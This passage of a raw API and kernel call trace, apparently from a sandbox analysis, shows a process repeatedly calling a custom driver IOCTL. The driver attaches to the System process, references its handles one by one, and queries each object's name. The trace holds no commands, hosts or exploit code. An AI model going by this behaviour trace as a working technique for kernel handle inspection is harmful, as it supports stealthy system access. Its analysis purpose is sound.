(HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.145] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x7a, lpOverlapped=0x0) returned 1 [0199.145] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.145] PsAcquireProcessExitSynchronization () returned 0x0 [0199.145] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.145] ObReferenceObjectByHandle (in: Handle=0xffffffff800002b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800e15a8e0, HandleInformation=0x0) returned 0x0 [0199.145] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.145] PsReleaseProcessExitSynchronization () returned 0x2 [0199.145] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.145] ObQueryNameString (in: Object=0xfffffa800e15a8e0, ObjectNameInfo=0xfffffa8003083044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003083044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.146] ObfDereferenceObject (Object=0xfffffa800e15a8e0) returned 0x1 [0199.146] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.146] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.146] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.146] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xf6, lpOverlapped=0x0) returned 1 [0199.146] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.146] PsAcquireProcessExitSynchronization () returned 0x0 [0199.146] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.146] ObReferenceObjectByHandle (in: Handle=0xffffffff800002d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800372ff20, HandleInformation=0x0) returned 0x0 [0199.146] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.146] PsReleaseProcessExitSynchronization () returned 0x2 [0199.146] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.146] ObQueryNameString (in: Object=0xfffffa800372ff20, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.146] ObfDereferenceObject (Object=0xfffffa800372ff20) returned 0x2 [0199.146] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.147] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.147] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.147] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0199.147] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.147] PsAcquireProcessExitSynchronization () returned 0x0 [0199.147] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.147] ObReferenceObjectByHandle (in: Handle=0xffffffff800002d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037208e0, HandleInformation=0x0) returned 0x0 [0199.147] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.147] PsReleaseProcessExitSynchronization () returned 0x2 [0199.147] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.148] ObQueryNameString (in: Object=0xfffffa80037208e0, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.148] ObfDereferenceObject (Object=0xfffffa80037208e0) returned 0x2 [0199.148] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.148] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.148] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.148] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x9c, lpOverlapped=0x0) returned 1 [0199.148] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.148] PsAcquireProcessExitSynchronization () returned 0x0 [0199.148] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.148] ObReferenceObjectByHandle (in: Handle=0xffffffff800002dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003727c00, HandleInformation=0x0) returned 0x0 [0199.148] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.148] PsReleaseProcessExitSynchronization () returned 0x2 [0199.149] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.149] ObQueryNameString (in: Object=0xfffffa8003727c00, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.149] ObfDereferenceObject (Object=0xfffffa8003727c00) returned 0x1 [0199.149] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.149] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.149] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.149] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0199.149] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.149] PsAcquireProcessExitSynchronization () returned 0x0 [0199.149] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.149] ObReferenceObjectByHandle (in: Handle=0xffffffff800002e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003727ab0, HandleInformation=0x0) returned 0x0 [0199.149] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.150] PsReleaseProcessExitSynchronization () returned 0x2 [0199.150] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.150] ObQueryNameString (in: Object=0xfffffa8003727ab0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.150] ObfDereferenceObject (Object=0xfffffa8003727ab0) returned 0x1 [0199.150] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.150] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.150] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.150] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xa6, lpOverlapped=0x0) returned 1 [0199.150] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.151] PsAcquireProcessExitSynchronization () returned 0x0 [0199.151] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.151] ObReferenceObjectByHandle (in: Handle=0xffffffff800002e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800372d8e0, HandleInformation=0x0) returned 0x0 [0199.151] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.151] PsReleaseProcessExitSynchronization () returned 0x2 [0199.151] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.151] ObQueryNameString (in: Object=0xfffffa800372d8e0, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.151] ObfDereferenceObject (Object=0xfffffa800372d8e0) returned 0x1 [0199.151] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.152] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.152] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.152] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x140, lpOverlapped=0x0) returned 1 [0199.152] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.152] PsAcquireProcessExitSynchronization () returned 0x0 [0199.152] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.152] ObReferenceObjectByHandle (in: Handle=0xffffffff800002e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800372eda0, HandleInformation=0x0) returned 0x0 [0199.152] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.152] PsReleaseProcessExitSynchronization () returned 0x2 [0199.152] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.152] ObQueryNameString (in: Object=0xfffffa800372eda0, ObjectNameInfo=0xfffffa8003131044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003131044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.153] ObfDereferenceObject (Object=0xfffffa800372eda0) returned 0x2 [0199.153] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.153] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.153] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.153] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x140, lpOverlapped=0x0) returned 1 [0199.153] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.153] PsAcquireProcessExitSynchronization () returned 0x0 [0199.153] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.153] ObReferenceObjectByHandle (in: Handle=0xffffffff800002ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003733e20, HandleInformation=0x0) returned 0x0 [0199.153] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.154] PsReleaseProcessExitSynchronization () returned 0x2 [0199.154] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.154] ObQueryNameString (in: Object=0xfffffa8003733e20, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.154] ObfDereferenceObject (Object=0xfffffa8003733e20) returned 0x2 [0199.154] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.154] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.154] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.154] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0199.154] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.154] PsAcquireProcessExitSynchronization () returned 0x0 [0199.154] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.154] ObReferenceObjectByHandle (in: Handle=0xffffffff800002f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800372f880, HandleInformation=0x0) returned 0x0 [0199.154] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.155] PsReleaseProcessExitSynchronization () returned 0x2 [0199.155] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.155] ObQueryNameString (in: Object=0xfffffa800372f880, ObjectNameInfo=0xfffffa800313e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800313e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.155] ObfDereferenceObject (Object=0xfffffa800372f880) returned 0x1 [0199.155] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.155] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.155] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.155] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0199.155] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.155] PsAcquireProcessExitSynchronization () returned 0x0 [0199.155] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.155] ObReferenceObjectByHandle (in: Handle=0xffffffff800002f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037328b0, HandleInformation=0x0) returned 0x0 [0199.155] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.156] PsReleaseProcessExitSynchronization () returned 0x2 [0199.156] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.156] ObQueryNameString (in: Object=0xfffffa80037328b0, ObjectNameInfo=0xfffffa8003144044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003144044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.156] ObfDereferenceObject (Object=0xfffffa80037328b0) returned 0x2 [0199.156] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.156] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.156] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.156] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0199.156] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.156] PsAcquireProcessExitSynchronization () returned 0x0 [0199.156] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.156] ObReferenceObjectByHandle (in: Handle=0xffffffff80000320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed4a90, HandleInformation=0x0) returned 0x0 [0199.156] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.156] PsReleaseProcessExitSynchronization () returned 0x2 [0199.156] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.156] ObQueryNameString (in: Object=0xfffffa8001ed4a90, ObjectNameInfo=0xfffffa8003147044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003147044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.156] ObfDereferenceObject (Object=0xfffffa8001ed4a90) returned 0x2 [0199.156] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.157] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.157] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.157] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xf2, lpOverlapped=0x0) returned 1 [0199.157] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.157] PsAcquireProcessExitSynchronization () returned 0x0 [0199.157] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.157] ObReferenceObjectByHandle (in: Handle=0xffffffff80000324, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037598a0, HandleInformation=0x0) returned 0x0 [0199.157] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.157] PsReleaseProcessExitSynchronization () returned 0x2 [0199.157] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.157] ObQueryNameString (in: Object=0xfffffa80037598a0, ObjectNameInfo=0xfffffa8003148044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003148044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.158] ObfDereferenceObject (Object=0xfffffa80037598a0) returned 0x2 [0199.158] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.158] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.158] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.158] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x98, lpOverlapped=0x0) returned 1 [0199.158] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.158] PsAcquireProcessExitSynchronization () returned 0x0 [0199.158] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.158] ObReferenceObjectByHandle (in: Handle=0xffffffff80000328, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa800374f9b0, HandleInformation=0x0) returned 0x0 [0199.159] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.159] PsReleaseProcessExitSynchronization () returned 0x2 [0199.159] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.159] ObQueryNameString (in: Object=0xfffffa800374f9b0, ObjectNameInfo=0xfffffa800314b044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314b044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.159] ObfDereferenceObject (Object=0xfffffa800374f9b0) returned 0x1 [0199.159] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.159] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.159] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.159] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0199.160] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.160] PsAcquireProcessExitSynchronization () returned 0x0 [0199.160] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.160] ObReferenceObjectByHandle (in: Handle=0xffffffff8000032c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003756f20, HandleInformation=0x0) returned 0x0 [0199.160] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.160] PsReleaseProcessExitSynchronization () returned 0x2 [0199.160] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.160] ObQueryNameString (in: Object=0xfffffa8003756f20, ObjectNameInfo=0xfffffa800314f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800314f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.160] ObfDereferenceObject (Object=0xfffffa8003756f20) returned 0x1 [0199.160] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.160] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.161] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.161] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0xa2, lpOverlapped=0x0) returned 1 [0199.161] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0199.161] PsAcquireProcessExitSynchronization () returned 0x0 [0199.161] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880052b35d0) [0199.161] ObReferenceObjectByHandle (in: Handle=0xffffffff80000330, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3000, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003756d50, HandleInformation=0x0) returned 0x0 [0199.161] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0199.161] PsReleaseProcessExitSynchronization () returned 0x2 [0199.161] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0199.161] ObQueryNameString (in: Object=0xfffffa8003756d50, ObjectNameInfo=0xfffffa8003150044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003150044, ReturnLength=0xfffff880052b3550) returned 0x0 [0199.161] ObfDereferenceObject (Object=0xfffffa8003756d50) returned 0x1 [0199.161] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0199.161] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x1dc05e0 | out: hHeap=0x320000) returned 1 [0199.161] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x1dc05e0 [0199.161] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1dc05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1dc05e0*, lpBytesReturned=0x12d450*=0x13c, lpOverlapped=0x0) returned 1 [0199.162] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880052b3558 